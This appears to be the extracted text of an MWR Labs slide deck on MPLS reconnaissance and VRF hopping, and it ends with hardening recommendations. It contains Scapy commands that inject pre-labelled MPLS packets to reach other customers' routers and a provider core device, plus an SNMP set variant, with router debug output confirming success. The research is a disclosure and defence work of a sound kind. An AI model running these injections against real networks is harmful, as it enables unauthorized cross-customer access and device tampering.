MWR Labs 35 root@R1:~# tcpdump -ntr traffic.pcap reading from file modified.pcap, link-type EN10MB (Ethernet) MPLS (label 0, exp 0, [S], ttl 0) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 1) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 2) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 3) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 root@R1:~# MPLS Network Reconnaissance
33.
Labs.mwrinfosecurity.com | ©
MWR Labs 36 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 How about LSR/LER IP addresses? • The number of intermediate devices along the LSP is mostly irrelevant anyway. • Revealing the LSR/LER IP addresses would be a lot more beneficial to an attacker.
34.
Labs.mwrinfosecurity.com | ©
MWR Labs 37 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# traceroute -n 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 0.417 ms 0.289 ms 0.274 ms 2 192.168.101.2 32.230 ms 43.308 ms 54.030 ms root@R1:~# R1
35.
Labs.mwrinfosecurity.com | ©
MWR Labs 39 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# hping3 -G --icmp -c 1 192.168.101.2 HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28 headers + 0 data bytes len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8 ms RR: 1.2.3.4 172.16.0.1 192.168.101.1 192.168.101.2 192.168.101.2 172.16.0.6 192.168.100.1 --- 192.168.101.2 hping statistic --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 30.8/30.8/30.8 ms root@R1:~#
36.
Labs.mwrinfosecurity.com | ©
MWR Labs 40 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# hping3 -G --icmp -c 1 192.168.101.2 HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28 headers + 0 data bytes len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8 ms RR: 1.2.3.4 172.16.0.1 192.168.101.1 192.168.101.2 192.168.101.2 172.16.0.6 192.168.100.1 --- 192.168.101.2 hping statistic --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 30.8/30.8/30.8 ms root@R1:~#
37.
Labs.mwrinfosecurity.com | ©
MWR Labs 41 MPLS Network Reconnaissance Remember IP Record Route? • IP option used to trace the route an IP packet takes through the network. • Router is expected to insert its IP address as configured on its egress interface. • Label Switching Routers (LSR) process traffic based on labels in the MPLS header. • The question remains as to why a number of implementations honor the IP options field.
38.
Labs.mwrinfosecurity.com | ©
MWR Labs 42 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 Now what? • Sending traffic directly to an LSR interface. • Assume point-to-point links and derive the internal IP address of an adjacent PE device. • There is no way for an intermediate LSR to reply due to lack of routing information. • Remember that a VRF has only local significance.
39.
Labs.mwrinfosecurity.com | ©
MWR Labs 43 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# ping -c 3 172.16.0.2 PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data. 64 bytes from 172.16.0.2: icmp_seq=1 ttl=64 time=1.31 ms 64 bytes from 172.16.0.2: icmp_seq=2 ttl=64 time=0.537 ms 64 bytes from 172.16.0.2: icmp_seq=3 ttl=64 time=0.545 ms --- 172.16.0.2 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2002ms rtt min/avg/max/mdev = 0.537/0.942/1.744/0.567 ms root@R1:~# R1
40.
Labs.mwrinfosecurity.com | ©
MWR Labs 44 MPLS Network Reconnaissance Food for thought? • Test results varied per implementation. • One vendor was unaffected. • Several vendors were affected by one or more than one of these weaknesses. • One vendor was affected by all of these. • What about a heterogeneous network?
41.
Labs.mwrinfosecurity.com | ©
MWR Labs 45 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
42.
Labs.mwrinfosecurity.com | ©
MWR Labs 46 VRF Hopping What is VRF hopping? • Unauthorised Inter-VRF communication. • Breaking out of our VRF and injecting traffic into other customers’ VRFs. • Potentially allowing for injecting into a service provider’s management VRF. • It is usually achieved by sending pre-labelled traffic to a Provider Edge (PE) device. • It is possible on a misconfigured PE to CE link. • Potentially complicated in case of overlapping address spaces across the VRFs.
43.
Labs.mwrinfosecurity.com | ©
MWR Labs 48 VRF Hopping Attacking MPLS Clients • Customer traffic flows within dedicated VRFs. • There is no Inter-VRF communication, unless route leaking is explicitly configured. • Global routing table into a VRF and vice versa. • VRF to VRF. • Attacking other clients implies Inter-VRF traffic flow. • Successful VRF hopping attack results in reaching another client’s CE device.
44.
Labs.mwrinfosecurity.com | ©
MWR Labs 49 Attacking MPLS Clients • Customer A (VRF A) • Site 1 (R1): 192.168.100.2/30 • Site 2 (R2): 192.168.101.2/30 • Customer B (VRF B) • Site 1 (R3): 192.168.200.2/30 • Site 2 (R4): 192.168.201.2/30 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R1 R2 R3 R4
45.
Labs.mwrinfosecurity.com | ©
MWR Labs 50 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 root@R1:~# ping -c 3 192.168.201.2 PING 192.168.201.2 (192.168.201.2) 56(84) bytes of data. --- 192.168.201.2 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 1999ms root@R1:~# R1 R2 R3 R4
46.
Labs.mwrinfosecurity.com | ©
MWR Labs 51 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# debug ip icmp ICMP packet debugging is on R4# R1 R2 R3 R4
47.
Labs.mwrinfosecurity.com | ©
MWR Labs 52 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>> R1 R2 R3 R4
48.
Labs.mwrinfosecurity.com | ©
MWR Labs 53 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>> R1 R2 R3 R4 R1 R4
49.
Labs.mwrinfosecurity.com | ©
MWR Labs 54 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# *Mar 1 00:29:34.383: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 *Mar 1 00:29:34.387: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 R4# R1 R2 R3 R4
50.
Labs.mwrinfosecurity.com | ©
MWR Labs 55 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# *Mar 1 00:29:34.383: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 *Mar 1 00:29:34.387: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 R4# R1 R2 R3 R4 R1
51.
Labs.mwrinfosecurity.com | ©
MWR Labs 56 VRF Hopping Attacking Service Provider Devices • MPLS core devices should never be directly reachable from customers. • LSRs are usually accessed from within a dedicated management VRF. • Injecting traffic with certain labels may allow for reaching an LSR.
52.
Labs.mwrinfosecurity.com | ©
MWR Labs 57 192.168.100.2/30 root@R1:~# ping -c 3 172.16.0.1 PING 172.16.0.1 (172.16.0.1) 56(84) bytes of data. --- 172.16.0.1 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 2015ms root@R1:~# R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5
53.
Labs.mwrinfosecurity.com | ©
MWR Labs 58 192.168.100.2/30 <P> debugging ip icmp <P> terminal monitor The current terminal is enabled to display logs. <P> terminal debugging The current terminal is enabled to display debugging logs. <P> R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5
54.
Labs.mwrinfosecurity.com | ©
MWR Labs 59 192.168.100.2/30 R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '172.16.0.1') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>>
55.
Labs.mwrinfosecurity.com | ©
MWR Labs 60 192.168.100.2/30 R2R1 <P> *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) <P>
56.
Labs.mwrinfosecurity.com | ©
MWR Labs 61 192.168.100.2/30 R2R1 <P> *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) <P> R1 R1
57.
Labs.mwrinfosecurity.com | ©
MWR Labs 62 VRF Hopping Attack Limitations • VLAN hopping limitations apply, i.e. one-way communication. • It is only useful against stateless protocols, e.g. SNMP. • Success or failure of attack is uncertain due to lack of response. • Label ranges will vary based on network size and vendor equipment. • Attacker can only reach a service provider LSR/LER or another customer’s CE.*
58.
Labs.mwrinfosecurity.com | ©
MWR Labs 63 VRF Hopping Improvements How about two-way communication? • There is always room for configuration- and design- specific attacks. • SNMP attacks require poorly configured CE devices. • Managed vs. Unmanaged Services. • Customer managed CE devices are most likely less hardened.
59.
Labs.mwrinfosecurity.com | ©
MWR Labs 64 VRF Hopping Improvements What do we need? • Configuration Prerequisites • SNMP write access enabled on a CE device. • Service accessible over a CE to PE link. • Low complexity SNMP community string. • Attack Scenario • VRF hopping as previously demonstrated. • SNMP community string guesswork. • Force the CE to encapsulate certain traffic in MPLS. • Configure an MPLS static binding rule.
60.
Labs.mwrinfosecurity.com | ©
MWR Labs 65 192.168.100.2/30 192.168.201.2/30 R1 R2 R3 R4 >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = UDP(sport = 161, dport = 161) >>> e = SNMP(community = '...', PDU = SNMPset(varbindlist = [SNMPvarbind(oid = ASN1_OID('...'), value = ...)])) >>> sendp(a/b/c/d/e) ... Sent 500 packets. >>>
61.
Labs.mwrinfosecurity.com | ©
MWR Labs 66 VRF Hopping Improvements What can go wrong? • SNMP hurdles are highly likely. • The interesting MIBs may be read-only. • Picking up the wrong OID values. • Denial of Service due to introducing CE misconfigurations.
62.
Labs.mwrinfosecurity.com | ©
MWR Labs 73 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
63.
Labs.mwrinfosecurity.com | ©
MWR Labs 74 MPLS Hardening MPLS Network Security Recommendations • Disable IP TTL propagation at the edge of the MPLS domain, i.e. on the ingress LSRs. • Disable ICMP tunnelling throughout the LSPs. • Disable management protocols and unwanted services on the customer facing interfaces. • Enable Generalised TTL Security Mechanism (GTSM) [RFC-3682]. • Follow the recommendations as specified in Security Framework for MPLS and GMPLS Networks [RFC-5920].
64.
Labs.mwrinfosecurity.com | ©
MWR Labs 75 MPLS Hardening General Guidelines • Assume presence of malicious or compromised clients. • Restrictive ACLs for accessing the LSR devices. • Secure device management protocols, e.g. SNMPv3, HTTPS, SSH. • Routing protocol authentication. • MPLS signalling protocol authentication. • Centralised AAA services and logging. • Secure configuration baseline. • Consistent configurations across the network. • Configuration files version control.
65.
Labs.mwrinfosecurity.com | ©
MWR Labs 76 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
66.
Labs.mwrinfosecurity.com | ©
MWR Labs 77 Future Research What else is there to look at? • VRF Hopping Attack Scenarios • UDP Services • MPLS Signalling Protocols • Label Distribution Protocol (LDP) • Resource Reservation Protocol (RSVP) • More Protocol Fuzzing
67.
Labs.mwrinfosecurity.com | ©
MWR Labs 78 Acknowledgements • MWR Labs • Alex Plaskett • John Fitzpatrick • Harry Grobbelaar • Willie Victor • Pavel Stefanov (CCIE R&S, CCIE Service Provider)
68.
Labs.mwrinfosecurity.com | ©
MWR Labs 79 Questions • Feedback • @munmap • georgi.geshev@mwrinfosecurity.com
Baixar agora